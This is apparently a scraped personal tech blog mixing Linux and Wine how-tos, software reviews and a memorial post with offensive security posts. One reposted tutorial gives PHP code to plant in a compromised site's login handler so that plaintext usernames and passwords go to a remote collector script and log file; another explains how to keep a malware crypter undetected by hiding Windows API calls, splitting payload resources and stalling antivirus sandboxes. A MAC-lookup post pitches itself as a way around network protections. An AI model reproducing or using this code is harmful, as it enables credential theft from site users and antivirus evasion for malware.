First of all, install WINE and in this tutorial, I assume that you've installed the WINE. Now, change the permission of your counter-strike 1.6 executable's permission by issuing the command chmod +x Counter-Strike1.6.exe

After finishing the installation, the shortcut icons will be created in your desktop and you might need to edit the shortcut for fully working counter strike installation. Otherwise, the game will just freeze in a window. To edit the shortcut, open the Counter-Strike 1.6.desktop file with gedit and replace all the contents with the content below:

[Desktop Entry]
Name=Counter-Strike 1.6
Exec=env WINEPREFIX="/home/samar/.wine" wine hl.exe -game C:\\\\Program\\ Files\\\\Counter-Strike\\ 1.6\\\\cstrike.exe -gl -gldrv Default -w 800 -h 600
Type=Application
StartupNotify=true
Path=/home/samar/.wine/dosdevices/c:/Program Files/Counter-Strike 1.6
Icon=BBDA_cstrike.0

Also, be sure to edit this file according to your home folder. You'll have to replace samar with your home folder name in the above content.

Now, you are ready to go. The game will play well without any noticiable errors. Have fun. :)

Read more...

100s of Ebooks For Download [Link]

I was just google searching when I found this site with 100s of ebooks under different categories and I thought to share the link over here.

Link: http://www.sudancs.com/Books/

Copy the above link and paste in your address bar. This link consists of 100s of ebooks for direct download under following different categories:

Algorithms & Data Structure/
Artificial Intelligence/
Compilers/
Computer Architecture/
Computer Forensics/
Computer Graphics/
Cryptography/
Database/
Graphic @ Dezing/
Hacker & Cracker/
Hardware/
Image Processing/
Mathematics @ Physics/
NetWork @ Wireless/
Operating System/
Others/
Programming language/
Robotics/
Security/
Simulation & Modeling/
Software @ Megazne/
Software Engineering & OOP/
Steganography/

I hope this is useful. Thanks. :)

Read more...

How to find MAC address of PC/device In Your Network

The MAC address of other PCs in LAN can be quite useful for some network protection bypassing such as internet access, etc. Today, I will show you how you can find the MAC address of any PC in your network.

Method 1: This method works in both windows and Linux. So open your terminal(in linux) or command prompt(in windows) and type:

ping <hostname>

Here, in place of <hostname>, type either computer's name or IP address whose MAC address you want to know.

Now, type the following command:

arp -a <hostname>

This will give you the arp entry cache of the specified hostname and this information also includes the MAC address of the PC. Sample output would be something like below:

techgaun.local (192.168.0.49) at 90:fb:a6:27:b7:6a [ether] on eth1

You can clearly spot the MAC address in the above output.

Method 2: This method is pretty useful and I do frequently use this tool to gather NetBIOS information of PCs in network. The tool I use is nbtscan and nbtscan is a program for scanning IP networks for NetBIOS name information. It sends NetBIOS status query to each address in supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address (such as Ethernet).

The tool is available for download for windows and different distros of Linux from HERE.

Also, you can install it under ubuntu by issuing following command from terminal.

sudo apt-get install nbtscan

Now, the usage of this tool is pretty straightforward.

nbtscan <hostname>

This will give the NetBIOS information of the requested hostname. But, this isn't the only thing. We can also mass-scan the network by giving the IP range.

nbtscan 192.168.0.1-255

This scans all the devices within the range 192.168.0.1 - 192.168.0.255 and displays the NetBIOS information of the computers in network.

I hope this helps some of you. Thanks :)

Read more...

Single Window Mode In GIMP

One of the basic problems GIMP has is lack of the single window mode and its so boring to see the multiple windows for each components of GIMP. Today, I'll list few of the ways to achieve single window mode in GIMP.

Method 1: Install the current development verion of GIMP i.e. 2.7 or higher and you'll have an option to run GIMP as single window mode. So you can install all the core dependencies (GEGL and BABL) and then install the GIMP2.7 from its source.

Method 2: Installing GIMPBox. GIMPBox is a python script that enables you to run gimp in the single window mode. To install it, type the following in the terminal.

sudo wget http://gimpbox.googlecode.com/hg/gimpbox.py -O /usr/local/bin/gimpbox && sudo chmod +x /usr/local/bin/gimpbox

Now, you can run GIMP in single window mode by just typing gimpbox in run command(ALT+F2).

Method 3: The third method is discussed in the ubuntuforums HERE

I hope these were helpful. Thanks. :)

Read more...

Web Application Attacking and Auditing with W3af Framework.

w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.

W3af is the tool written totally in Python and supports many techniques for detecting and exploiting the web based vulnerabilities.
Framework features

w3af provides plugin writers with this features:
urllib2 wrapper
In order to send requests to the remote server w3af uses urllib2. The xUrllib module of w3af is a wrapper of urllib2 to make the plugin writer life easier, using this wrapper a plugin writer can forget about proxy's, proxy auth, basic/digest auth, etc. This is the complete list of features provided by xUrllib:

- Proxy
- Proxy auth ( basic and digest )
- Site auth ( basic and digest )
- Gracefully handle timeouts
- UserAgent faking
- Add custom headers to requests
- Cookie handling
- Local cache for GET and HEAD requests
- Local dns cache, this will speed up scannings. Only one request is made to the DNS server
- Keep-alive support fot http and https connections
- File upload using multipart POST requests
- SSL certificate support

Output Management
w3af provides plugin writers with an abstraction layer for data output using the Output Manager. The output manager can also be extended using plugins and can be used for writing results to a txt/html file or sending them over the network using scp, the options are endless. Available ouput plugins are:
- Console
- Text file

Web Service support
w3af knows how to parse WSDL files, and audit webservices. Plugin developers can write a simple plugin that will be able to find bugs in web services and also in common HTTP applications.

HTTP headers fuzzing
w3af supports finding bugs in HTTP headers with great ease!

IPC
IPC ( inter plugin communication :P) can easily be done using the knowledge base, another w3af feature thats really usefull for plugin developers.

Session saving
Framework parameters can be saved to a file using the sessionManager. After that, you can load the settings and start the same scan again without configuring all parameters.

Fuzzer
Right now w3af has a really simple fuzzer, but we have plans to extend it. Fuzzers are great, we know it.

HTML / WML parsing
w3af provides HTML / WML parsing features that are really easy to use.

To install w3af under your ubuntu, type the following in the terminal.

sudo apt-get install w3af


Visit w3af homepage



Read more...

Cool ASCII Arts Using JAVE: A Free ASCII Editor

JavE is a free Ascii Editor. Rather than for editing texts, it is intended for drawing simple diagrams by using Ascii characters.
It is like a graphics editor for editing texts instead of images.

JavE is written in 100% pure Java and so should run on almost every operating system.
It is a standalone application and not available as applet.

Features

Freehand painting by mouse
FIGlet support - 195 fonts included
GIF/JPG/BMP to Ascii conversion with multiple options
crash recovery - edited documents can be recovered by JavE when starting the next time
Free shape selection tool
Easy textbox editing (borders, move, rescale)
Extendable clipart library
Export for multiple purposes (HTML, Java/C++/C/... comment)
move/copy/mirror/flip/rot13/...
And many many more - check it out!

Download Page of JavE



Read more...

How to add Alt key support in Photoshop Under Ubuntu

If you are using wine to run photoshop under your linux distribution, you might have come across this unfriendly problem of Alt key not working in photoshop. Alt key combination is very useful in photoshop as the shortcut to different tasks such as subtraction from selection and other tools and you might want to see this alt key working as per your wish.

The fix is pretty simple. By default, the window movement key is set to Alt because of which you can't use Alt key as you wish. But we can change this setting by going to System->Preferences->Windows. Under the Movement key, select the Super(i.e. windows logo) as the default movement key and now you can use the Alt key normally in photoshop. I've tested this in CS2 under ubuntu 10.10 but I guess it would work with any other versions as well.

I hope this helps some of you. :)

Read more...

Installing nepali fonts in ubuntu

The default font installation folder in linux is /usr/share/fonts and if you want to add any new fonts, you need to copy the font files in this directory. We are dealing with installing nepali truetype fonts so our installation directory is /usr/share/fonts/truetype.

Press Alt+F2 and type gksudo nautilus /usr/share/fonts/truetype which will open the nautilus file explorer. Now copy all the *.ttf files into that folder and restart any program you want the fonts to be used in.

Another method which would make the fonts available only for the logged in user is by making a font directory in the home folder. First, create the new folder in the home directory.

mkdir ~/.fonts

Now, copy paste all the *.ttf files to this folder and restart any application where you want to use that font.

Read more...

How to steal password from login form

This article is written by neutralised of thesoftwareengineer.org but the domain has already expired so I thought to put this article here so that this small piece of information for beginner web hackers won't die.

-------------------------------------------------
[+] Login Form Password Stealing - Tutorial
[+] Author: Neutralise
[+] Location: http://thesoftwareengineer.org/services/tuts/LoginFormPassStealing.txt
--------------------------------------------------

Intro:
It seems that alot of people these days are gaining shell access, downloading a database then attempting to crack the hashes. If they are salted, sha1 or a hard to crack plain ole' MD5, they start bitchin and moaning when they can't get the plain text. So here it is, a tutorial on how to get user:pass format in plain text of ANY hash type.

Method:
Modify the login form of a site to catch the password remotely, before it is encrypted. I will explain this more simply via an example.
Take the following login form for example,

<form method="post" action="cookies.php">
<hr />
<p>
User: <input type="text" class="buttonstyle" name="username"></p>
<p>
Pass: <input type="password" class="buttonstyle" name="password"></p>
<p>
<input type="submit" value="Login" class="buttonstyle" name="submit"> 

<input type="reset" value="Reset" class="buttonstyle" /></p>
</form>

Now we can see that the action of this form points to 'cookies.php'. Now cookies.php will probably include a function similar to this depending on the encryption type, etc.

<?php
$user = $_POST['username'];
$pass = $_POST['password'];
if(md5($user) == $usermd5 && md5($pass) == $passmd5){
setcookie("Whatever", $cookie, time()+3600, "/");
header("Location: index.php");
die();
}
?>

Now on to bypassing the encryption before it happens, thus gaining the username and password in plain text we need to edit the 'cookie.php' site, add the following code at the start of the php tags.

<?php
$user = $_POST['username'];
$pass = $_POST['password'];
file_get_contents("http://site.com/plain.php?user=".$user."&pass=".$pass."");
?>>

Now the php file 'plain.php' will include the following code:

<?php
$user = $_GET['user'];
$pass = $_GET['pass'];
$file = "lol.txt";
$fp = fopen($file, "a");
fputs($fp, "$user:$pass\n");
fclose($fp);
?>>

Notice you will also need to upload a file 'lol.txt', and chmod it to 777.

Conclusion:
Now every time a user logs into the site you are editing the code of, it will send the username and password to the 'plain.php' text file and save it in 'log.txt', on a remoteserver in the format of:
user:pass

------------------------------
[+]^Neutralised.
------------------------------

Read more...

How to keep your crypter undetected or nearly FUD

This article is written by NoX of XR offensive security team and I found it to be rare and pretty interesting. I hope you will love this article.

In this I will show you how I kept my "Crypter" Fully UnDetected.

Alll source is in C/C++

So there are 3 main ways Anti Viruses will detect your software:

1: With a "signature" (some bytes/pattern of bytes in your binary)
2: Heuristics ("generic detection designed to detect new or previously unseen malware")
3: Running it in a VM (The anti virus will run your software in a fake environment and see what it does)

This is how i combated these...

1 - "signature"
This one is easy, just write your own code
(The whole point of a crypter is to hide a signature anyway)

2 - Heuristics
Ok the 2 types of things I found anti viruses picked up with heuristics was

A - Windows APIs
To combat this you can simple use the GetProcAddress() and GetModuleHandle() API
I found if you use it like this most anti viruses still detect it

GetProcAddress(GetModuleHandle("module name"), "method name");

But when I did it like these they would no longer detect it

char szModuleName[] = "module name";
char szMethodName[] = "method name";
GetProcAddress(GetModuleHandle(szModuleName), szMethodName);

This is a full example of using this technice to hide an API from a anti virus

typedef BOOL (WINAPI *__CreateProcess)
(
LPCTSTR lpApplicationName,
LPTSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCTSTR lpCurrentDirectory,
LPSTARTUPINFO lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation
);
const char szCreateProcessA[] = "CreateProcessA";
const char szKernel32[] = "kernel32.dll";
__CreateProcess _CreateProcess = (__CreateProcess)GetProcAddress(GetModuleHandle(sz Kernel32), szCreateProcessA);

Now u can replace all your calls of "CreateProcess()" with "_CreateProcess" =)
if u want to go over-kill u can also encrypt the string you use to load the function eg "CreateProcessA" and "kernel32.dll" when you define them as variables. then decrypt them before you call the GetProcAddress and GetModuleHandle... but I found this was not needed.

Also people say the methods and varible names should be something not sus, but I didn't find this as a problem.

B - Large RCDATA resources on the file
When I had a large RCDATA resource on the .exe anti viruses would flag it as a dropper. To fix this I simple split the rouses up into severale sperate resources less then 500kb each but 1000kb would probs be safe.
(I was using resources to store the crypted payload/exe in)

3 - Running it in a VM
There are lots of fancy ways to detect VMs them end your process early if you find that you are in one. But the VMs will update and your method will stop working and you wont be able to write code for every single VM

Common ways of detect VMs is to look up system variables that are known for the particular VM and then "return 0" if they are found.

I found a lot simpler way to bypass these VMs where to make them time out.
As a antivius software needs to be able to real time scan all .EXEs before you run then and not use much system resources to do this you can simple add a few seconds of useless code at the start of your software.

I used this

for ( int d = 0; d < 5000000; d++ )
{
int x = 1;
int y = x;
delete &x;
delete &y;
}

All this is a for loop that runs 5000000 and does some junk in it. It takes ~2 seconds to run and bypasses all known Antivirus VMs all the online multi scanners I have tried. What you do can be different and SHOULD be different as if every one used the same thing we would create a "signature". But basically a long loop that would take ~1-3 seconds should do. I personally think the delay of ~2 seconds is worth bypassing all the anti viruses ~50% of anivirus use a VM to detect malware these days... (I base this on nothing :)
Read more...

How to find version of your ubuntu installation

In order to find the version of the ubuntu installation, you can follow any of two easy steps. The first easier way is to go to System->About Ubuntu where the version of your ubuntu installation will be shown. The next way is to view the content of the file that stores the version name of your ubuntu.

To find ubuntu version from terminal, you can type:

cat /etc/issue

/etc/issue file holds the issue/version information of your ubuntu installation.

Read more...

We'll always miss you Narendra

On March 30, one of our beloved friends Narendra Bist(2046/12/15 B.S.-2067/12/16 B.S.) had to lose his life just one day after his birthday celebration and we all the classmates are in deep shock and we can't still believe that the accident happened. I still think he's still watching movies in his room as he always does.

Well, please do not take this as april 1 post, it is just the co-incidence

Narendra Bist was one of our close friends and my neighbor in the hostel and we always used to have little chit chats everyday and its been so hard for me to believe that he has passed away. He was too young to die and I can't understand why the f**king god takes good people away from us. Now I feel that there must be one chance for anyone who dies so that he/she can return again.

He was pulled by the water stream while swimming and he could not swim out from the evil water stream in Indrawati river at Dolalghat. But, the ultimate reason for his death is Kathmandu University administration as KU admin was acting so lame. We continuously had 1 month long strike in the university and KU admin didn't show any responsibility in opening the university. The students had to find some way of time-pass and our friend lost his life because of this.

There's nothing we can do now. We just keep on thinking "if we could do". Only thing we can do is take lesson from this accident.

Few photos of our beloved Narendra Bist(You will see he is too young and innocent to die this young):

My all time favorite "Too much love will kill you" by Queen:



We'll always miss you Narendra. With love.
C.E. 09

Read more...